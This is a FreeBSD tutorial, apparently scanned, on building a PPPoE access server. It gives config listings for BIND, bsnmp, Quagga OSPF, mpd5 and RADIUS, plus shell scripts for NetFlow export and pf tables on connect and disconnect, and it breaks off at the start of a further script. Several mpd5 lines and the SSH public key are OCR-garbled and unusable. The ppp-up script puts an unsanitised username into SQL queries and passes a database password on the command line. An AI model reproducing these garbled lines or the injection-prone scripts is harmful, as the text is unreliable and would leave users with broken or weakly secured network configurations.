zone "localhost" { type master; file "/usr/local/etc/namedb/master/localhost-forward.db"; };
zone "127.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/localhost-reverse.db"; };
zone "255.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "0.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/localhost-reverse.db"; };
zone "0.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "10.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "16.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "17.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "18.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "19.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "20.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "21.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "22.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "23.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "24.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "25.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "26.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "27.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "28.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "29.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "30.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "31.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "168.192.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "64.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "65.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "66.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "67.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "68.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "69.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "70.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "71.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "72.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "73.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "74.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "75.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "76.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "77.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "78.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "79.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "80.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "81.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "82.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "83.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "84.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "85.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "86.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "87.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "88.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "89.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "90.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "91.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "92.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "93.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "94.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "95.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "96.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "97.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "98.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "99.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "100.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "101.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "102.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "103.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "104.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "105.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "106.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "107.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "108.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "109.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "110.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "111.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "112.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "113.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "114.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "115.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "116.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "117.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "118.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "119.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "120.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "121.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "122.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "123.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "124.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "125.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "126.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "127.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "254.169.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "0.0.192.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "2.0.192.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "100.51.198.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "113.0.203.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "8.b.d.0.1.0.0.2.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "test" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "example" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "invalid" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "example.com" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "example.net" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "example.org" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "18.198.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "19.198.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "240.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "241.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "242.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "243.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "244.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "245.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "246.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "247.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "248.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "249.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "250.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "251.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "252.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "253.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "254.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "1.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "3.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "4.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "5.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "6.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "7.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "8.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "9.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "a.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "b.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "c.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "d.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "e.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "0.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "1.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "2.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "3.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "4.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "5.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "6.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "7.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "8.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "9.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "a.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "b.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "0.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "1.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "2.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "3.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "4.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "5.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "6.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "7.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "c.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "d.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "8.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "9.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "a.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "b.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "c.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "d.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "e.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "f.e.f.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "ip6.int" { type master; file "/usr/local/etc/namedb/master/empty.db"; };

controls {
	inet 127.0.0.1 allow { localhost; } keys { "rndc-key"; };
};

include "/usr/local/etc/namedb/rndc.key";

#eof


Listing 22. 

# ssh-keygen 

# cat /root/.ssh/id_rsa.pub

ssh-rsa AAAAB3NzaClyc2EAAAADAQABAAABAQDPVC3ksxLRuHPcknfskNhXxxhtrgfq40904T/wJsrPlETgQMmjg3kbHDbszeAio/y7au2rORRWSadmQ 
R517dQhBI0qdWF5Zp+SbBfebik7 rmJeoTCpESQySH9KM/nBsDx91+UiDogEQziQJtkIIRouxX8nZghLc5JJkzcj £00MS7pQ4LzISmDCDJQ75VsG00QZ 
a0du40lvngj]x8fMvk182rCkhYaMUhbhR1injBvhNSWn fOY51FpOocbiOSMGym4pHOEJNWiQHLtVKY+1D5peA03UM1il7rz1lZkQWLFCaAvJlaEXlasw3 
ylW7/AzvCVas 6uKkyutet4GYYSUoD3vVXAbUZ root@valhalla.connectionlost.com.br 
Listing 23.

# vi /etc/snmpd.config
location := "connectionlost"
contact := "troqoncalves@connectionlost.com.br"
system := 1 # FreeBSD
traphost := localhost
trapport := 162
# "mudar" means "change": these community strings are placeholders, set your own
read := "mudar_community"
Eeao = 9) Gaon conm™

%snmpd
begemotSnmpdDebugDumpPdus = 2
begemotSnmpdDebugSyslogPri = 7
begemotSnmpdCommunityString.0.1 = $(read)
begemotSnmpdCommunityDisable = 1
begemotSnmpdPortStatus.0.0.0.0.161 = 1
begemotSnmpdLocalPortStatus."/var/run/snmpd.sock" = 1
begemotSnmpdLocalPortType."/var/run/snmpd.sock" = 4
begemotTrapSinkStatus.[$(traphost)].$(trapport) = 4
begemotTrapSinkVersion.[$(traphost)].$(trapport) = 2
begemotTrapSinkComm.[$(traphost)].$(trapport) = $(trap)
sysContact = $(contact)
sysLocation = $(location)
sysObjectId = 1.3.6.1.4.1.12325.1.1.2.1.$(system)
snmpEnableAuthenTraps = 2
begemotSnmpdModulePath."mibII" = "/usr/lib/snmp_mibII.so"
begemotSnmpdModulePath."pf" = "/usr/lib/snmp_pf.so"
begemotSnmpdModulePath."hostres" = "/usr/lib/snmp_hostres.so"
begemotSnmpdModulePath."ucd" = "/usr/local/lib/snmp_ucd.so"
#eof


Listing 24.

# vi /usr/local/etc/quagga/zebra.conf
!
hostname valhalla
! In Quagga "password 8 <string>" declares an already-encrypted password; with
! service password-encryption enabled, enter the clear-text form ("password mudarsenha")
! and let the daemon hash it. "mudarsenha" ("change password") is a placeholder.
password 8 mudarsenha
enable password 8 mudarsenha
service password-encryption
log file /var/log/zebra.log
!
interface em0
!
interface em1
!
interface igb0
!
interface igb1
!
interface igb2
!
interface igb3
!
interface igb4
!
interface igb5
!
interface igb6
!
interface igb7
!
interface lo0
!
interface lo1
!
interface pflog0
!
interface pfsync0
!
access-list filter-term permit 127.0.0.1/32
access-list filter-term deny any
!
ip forwarding
ipv6 forwarding
!
line vty
 access-class filter-term
!
#eof


# vi /usr/local/etc/quagga/ospfd.conf
!
hostname valhalla
password 8 mudarsenha
enable password 8 mudarsenha
service password-encryption
log file /var/log/ospf.log
!
interface em0
!
interface em1
!
interface igb0
!
interface igb1
!
interface igb2
!
interface igb3
!
interface igb4
 ip ospf network non-broadcast
!
interface igb5
!
interface igb6
!
interface igb7
!
interface lo0
!
interface lo1
!
interface pflog0
!
interface pfsync0
!
router ospf
 ospf router-id 203.0.113.5
 redistribute connected route-map PRIVATE
 redistribute kernel
 passive-interface default
 no passive-interface igb4
 network 203.0.113.0/24 area 0.0.0.0
 neighbor 203.0.113.1
!
ip prefix-list PRIVATE-NET seq 5 permit 203.0.113.0/24 le 32
ip prefix-list PRIVATE-NET seq 10 deny any
!
route-map PRIVATE permit 10
 match ip address prefix-list PRIVATE-NET
!
access-list filter-term permit 127.0.0.1/32
access-list filter-term deny any
!
line vty
 access-class filter-term
!
#eof


# vi /usr/local/etc/quagga/ospf6d.conf
!
hostname valhalla
password 8 mudarsenha
enable password 8 mudarsenha
service password-encryption
log file /var/log/ospf6.log
!
debug ospf6 lsa unknown
!
interface em0
!
interface em1
!
interface igb0
!
interface igb1
!
interface igb2
!
interface igb3
!
interface igb4
!
interface igb5
!
interface igb6
!
interface igb7
!
interface lo0
!
interface lo1
!
interface pflog0
!
interface pfsync0
!
router ospf6
 router-id 203.0.113.5
 redistribute kernel route-map PRIVATE6
 redistribute connected route-map PRIVATE6
 interface igb4 area 0.0.0.0
!
ipv6 prefix-list PRIVATE6-NET seq 5 permit 2001:db8::/32 ge 64
ipv6 prefix-list PRIVATE6-NET seq 10 deny any
ipv6 prefix-list filter-term seq 2 permit ::1/128
ipv6 prefix-list filter-term seq 10 deny any
!
route-map PRIVATE6 permit 10
 match ipv6 address prefix-list PRIVATE6-NET
!
line vty
 access-class filter-term
!


Listing 25. 
# vi /usr/local/etc/mpd5/mpd.conf 
Seige DIS) 


# console 
set user mpdadmin 123mudar admin 
set console selr 127.0-0.1 5005 
set console open 
# web interface 
set web seli 203-0 113.5 S006 
set web open 
# radius to receive coa and pod 
Seu radsry self U9G tol 100s5 3799 
See made ryv pec EUs. ol) 0 se muda Voenha 
set radsrv enable coa disconnect 
set radsrv open 
# flow export 
set netflow peer ip port 
set netflow timeouts 60 120 
set global max-children 50000 


Listing 26. 

log =-all tradiis +i bace 
it log tall 

create bundle template B 


# compression and cryptography 

# uncomment these two lines to enable compression and 
encryption 

it set bundle enable compression 


set bundle enable encryption 


# ipv6 


set bundle enable ipv6ocp 


# Set IP addresses. Peer address will later be replaced 
by RADIUS. 
see tpce dis 203.02 1ise5. 203-02 iiord 
set iface up-script "/root/scripts/ppp-up $1"
set iface down-script "/root/scripts/ppp-down $1"
set iface enable proxy-arp
set iface enable netflow-in
set iface enable netflow-out
# compression and cryptography
# uncomment these 7 lines to enable compression and encryption
set iface enable tcpmssfix
# set ccp yes mppc
# set mppc yes e40
# set mppc yes e56
# set mppc yes e128
# set mppc yes stateless
# (two of the seven commented lines are unreadable in the scan)
set ecp disable dese-bis dese-old

# create link template with common info
create link template common pppoe
# enable multilink protocol
set link enable multilink
# set bundle template to use
set link action bundle B
set link max-children 50000
# enable peer authentication
set link disable chap pap eap
# choose between chap or pap, remember to change your ... (rest of this comment is unreadable in the scan)
# uncomment the options you desire
set link enable chap
set link enable pap
# set link yes acfcomp protocomp
set link enable report-mac
set link keep-alive 10 60
# set link mtu 1492
set link mru 1492
set link bandwidth 10000000
load radius
set pppoe service "*"

# template for ifaces listen using common template
create link template igb3 common
set link max-children 10000
# set auth max-logins 0
set pppoe iface igb3
set link enable incoming
# you can enable other interfaces to listen to your internal network to respond pppoe requests
# template for ifaces listen using common template
# create link template igb2 common
# set link max-children 10000
# # set auth max-logins 0
# set pppoe iface igb2
# set link enable incoming
# template for ifaces listen using common template
# create link template igb1 common
# set link max-children 10000
# # set auth max-logins 0
# set pppoe iface igb1
# set link enable incoming
# template for ifaces listen using common template
# create link template igb0 common
# set link max-children 10000
# # set auth max-logins 0
# set pppoe iface igb0
# set link enable incoming
Listing 27.

set radius config /etc/radius.conf
# set radius server localhost testing123 1812 1813
# set radius retries 3
# set radius timeout 3
# Send the given IP in the RADIUS NAS-IP-Address attribute to the server.
# set radius me <NAS IP, unreadable in the scan>
# send accounting updates every 5 minutes
set auth acct-update 300
# enable RADIUS, and fallback to mpd.secret, if RADIUS auth failed
set auth enable radius-auth
# enable RADIUS accounting
set auth enable radius-acct
# protect our requests with the message-authenticator
set radius enable message-authentic
#eof




# cd /usr/ports/net/radvd
# make install clean

Install bsnmp-ucd:

# cd /usr/ports/net-mgmt/bsnmp-ucd/
# make install clean

Let's now create the settings of pf: Listing 18.


Edit /etc/ntp.conf, because you need the correct time to avoid problems in your logs:

#server 0.freebsd.pool.ntp.org iburst
#server 1.freebsd.pool.ntp.org iburst
#server 2.freebsd.pool.ntp.org iburst
#server 3.freebsd.pool.ntp.org iburst
server a.ntp.br
server b.ntp.br
server c.ntp.br
Compile a new kernel:

# cd /usr/src/sys/amd64/conf/
# mkdir -p /root/kernels/
# cp GENERIC /root/kernels/valhalla
# ln -s /root/kernels/valhalla .
# cd /usr/src


Add these lines to the kernel: Listing 19.

Now let's make some adjustments in the operating system to fit the current situation: Listing 20.

Let's configure bind as the recursive server for use by clients and the server: Listing 21.

Create the key:

# cd /usr/local/etc/namedb/
# rndc-confgen -a

Create log files:

# touch /var/log/named.log
# touch /var/log/security.log
# touch /var/log/xfer.log
# chown bind /var/log/named.log
# chown bind /var/log/security.log
# chown bind /var/log/xfer.log

Create an ssh key so that the cgi of the support system can work: Listing 22. Now let's configure bsnmp to enable snmp for monitoring: Listing 23.
Let's configure quagga for redistribution of routes via ospf. I'm not enabling authentication between neighbors here, but please enable it in your production network (Listing 24).

Create log files:

# touch /var/log/ospf.log
# touch /var/log/ospf6.log
# touch /var/log/zebra.log
# chown quagga:quagga /var/log/ospf.log
# chown quagga:quagga /var/log/ospf6.log
# chown quagga:quagga /var/log/zebra.log

Now the most important guy in the server -> the mpd5! Create the configuration file: Listing 25.

default:
        load pppoe_server

common:
        # enable multilink protocol
        set link enable multilink
        # set bundle template to use
        set link action bundle B
        # allow peer to authenticate us
        set link disable chap pap
        set link accept chap pap
        set auth authname MyLogin
        # set infinite redial attempts
        set link max-redial 0

pppoe_server: see Listing 26. radius: see Listing 27.

Create the radius.conf file:

# vi /etc/radius.conf
auth 198.51.100.2 senhaclienteradius
acct 198.51.100.2 senhaclienteradius

Create the mpd.secret file to have no problems:

# touch /usr/local/etc/mpd5/mpd.secret

Create the log file:

# touch /var/log/mpd5.log

Add in the last lines of the syslog.conf file:

# vi /etc/syslog.conf
!mpd5
*.*    /var/log/mpd5.log

Create the directory for the configuration files of radvd:

# mkdir -p /usr/local/etc/mpd5/ipv6

About NetFlow there are three situations:

-> If you are using single-stack (v4 or v6) and NAT, mpd does the job. Enable in mpd.conf:

set netflow peer ip port
set netflow timeouts 60 120
set iface enable netflow-in
set iface enable netflow-out


[Figure 5. SNMP Data - Traffic: bits per second over 24 hours. Inbound current 176,61 M, average 294,09 M, maximum 434,23 M; outbound current 22,16 M, average 32,99 M, maximum 59,21 M.]

Figure 5. SNMP Data - Traffic
Listing 28.

# touch /usr/local/etc/rc.d/nf_export
# chmod 755 /usr/local/etc/rc.d/nf_export
# cat /usr/local/etc/rc.d/nf_export

#!/bin/sh
#written by tfgoncalves (at) connectionlost (dot) com(dot) br
#1414503716
# REQUIRE: LOGIN
#
# Add the following lines to /etc/rc.conf to enable nf_export
# nf_export_enable (bool): Set to "NO" by default.
# Set it to "YES" to enable nf_export

. /etc/rc.subr

name=nf_export
rcvar=${name}_enable
load_rc_config $name
start_cmd="${name}_start"
stop_cmd="${name}_stop"
: ${nf_export_enable:="NO"}

nf_export_start()
{
    # hook ng_netflow between the external interface and its upper layer
    /usr/sbin/ngctl mkpeer igb4: netflow lower iface0
    /usr/sbin/ngctl name igb4:lower netflow_1
    /usr/sbin/ngctl connect netflow_1: igb4: iface1 upper
    /usr/sbin/ngctl connect netflow_1: netflow_1: out0 out1
    # export v9 records over UDP to the collector
    /usr/sbin/ngctl mkpeer netflow_1: ksocket export9 inet/dgram/udp
    /usr/sbin/ngctl name netflow_1:export9 ksocket_1
    /usr/sbin/ngctl msg ksocket_1: connect inet/203.0.113.15:700
}

nf_export_stop()
{
    /usr/sbin/ngctl shutdown netflow_1:
}

run_rc_command "$1"
#eof
Listing 29.

# mkdir -p /root/scripts/
# vi /root/scripts/ppp-up

#!/bin/sh
#written by tfgoncalves (at) connectionlost (dot) com(dot)br
#1414503716

# database host unreadable in the scan: replace <db-host> with your RADIUS database server
radius="/usr/local/bin/mysql -u userradius -h <db-host> radius -psenharadius -s -N -e"

# mpd calls this script as: ppp-up <iface> <inet|inet6> <local-ip> <remote-ip> <authname>
if [ "$2" = "inet" ]
then
    c_ip=$4
    c_ip_first=`echo $4 | cut -d "." -f 1`
fi
if [ "$2" = "inet6" ]
then
    c_ip6=$4
fi

username=$5

c_bloqueado=`$radius "select bloqueado from radcheck where attribute='Cleartext-Password' and UserName='$username';"`
if [ -z "$c_bloqueado" ]
then
    c_bloqueado=`$radius "select bloqueado from radcheck where attribute='Password' and UserName='$username';"`
fi
if [ "$2" = "inet" ] && [ "$c_bloqueado" = 1 ]
then
    /sbin/pfctl -t BLOQUEADOS -T add $c_ip
fi
if [ "$2" = "inet6" ] && [ "$c_bloqueado" = 1 ]
then
    /sbin/pfctl -t BLOQUEADOS6 -T add $c_ip6
fi
if [ "$2" = "inet" ]
then
    if [ "$c_ip_first" = 10 ]
    then
        /sbin/pfctl -t PRIVADOS -T add $c_ip
    else
        /sbin/pfctl -t PUBLICOS -T add $c_ip
    fi
fi
if [ "$2" = "inet6" ]
then
    /sbin/pfctl -t PUBLICOS6 -T add $c_ip6
fi

#V6 prefix from db
ng_prefix=`$radius "select value from radreply where attribute='Framed-IPv6-Prefix' and UserName='$username';"`
# keep only the network part, e.g. 2001:db8:1:a out of 2001:db8:1:a::/64
ng_subnet=$(echo $ng_prefix | sed 's,::/.*$,,')

#V6 prefix autogen
#ng=$(echo $1 | tr -d "[:alpha:]")
#ng_prefix=`printf "%x" $((0xA0 | $ng))`
#ng_subnet=2001:db8:XXXX:$ng_prefix   (middle hextet unreadable in the scan)

if [ "$ng_subnet" != "" ]
then
    /sbin/ifconfig $1 inet6 $ng_subnet::1 prefixlen 64
    ra_pid=/usr/local/etc/mpd5/ipv6/$1
    ra_conf=$ra_pid.conf
    # per-interface radvd config, one daemon per ppp interface
    echo 'interface' $1 > $ra_conf
    echo '{ AdvSendAdvert on; MinRtrAdvInterval 5; MaxRtrAdvInterval 100;' >> $ra_conf
    echo 'prefix' $ng_subnet::/64 '{ AdvOnLink on; AdvAutonomous on; };' >> $ra_conf
    # resolver address unreadable in the scan
    echo 'RDNSS <resolver-v6-address> { }; };' >> $ra_conf
    /usr/local/sbin/radvd -C /usr/local/etc/mpd5/ipv6/$1.conf -p /usr/local/etc/mpd5/ipv6/$1.pid &
fi
#eof

# chmod +x /root/scripts/ppp-up
Listing 30.

# vi /root/scripts/ppp-down

#!/bin/sh
#written by tfgoncalves (at) connectionlost (dot) com(dot)br
#1414503716

# database host unreadable in the scan: replace <db-host> with your RADIUS database server
radius="/usr/local/bin/mysql -u userradius -h <db-host> radius -psenharadius -s -N -e"

# mpd calls this script as: ppp-down <iface> <inet|inet6> <local-ip> <remote-ip> <authname>
if [ "$2" = "inet" ]
then
    c_ip=$4
    c_ip_first=`echo $4 | cut -d "." -f 1`
else
    c_ip6=$4
fi

username=$5

if [ "$2" = "inet" ] && [ "$c_ip_first" = 10 ]
then
    /sbin/pfctl -t PRIVADOS -T delete $c_ip
fi
if [ "$2" = "inet" ]
then
    /sbin/pfctl -t PUBLICOS -T delete $c_ip
    /sbin/pfctl -t BLOQUEADOS -T delete $c_ip
fi
if [ "$2" = "inet6" ]
then
    /sbin/pfctl -t PUBLICOS6 -T delete $c_ip6
    /sbin/pfctl -t BLOQUEADOS6 -T delete $c_ip6
fi

# stop the radvd started by ppp-up for this interface
if [ -f /usr/local/etc/mpd5/ipv6/$1.pid ]
then
    if6=$(cat /usr/local/etc/mpd5/ipv6/$1.pid)
else
    if6=""
fi
if [ -n "$if6" ]
then
    /bin/kill -9 $if6
    rm /usr/local/etc/mpd5/ipv6/$1.*
fi
#eof
Listing 31.

# vi /root/scripts/drop_blocked

#!/bin/sh
#written by tfgoncalves (at) connectionlost (dot) com(dot)br
#1414503716

# database host unreadable in the scan: replace <db-host> with your RADIUS database server
radius="/usr/local/bin/mysql -u userradius -h <db-host> radius -psenharadius -s -N -e"

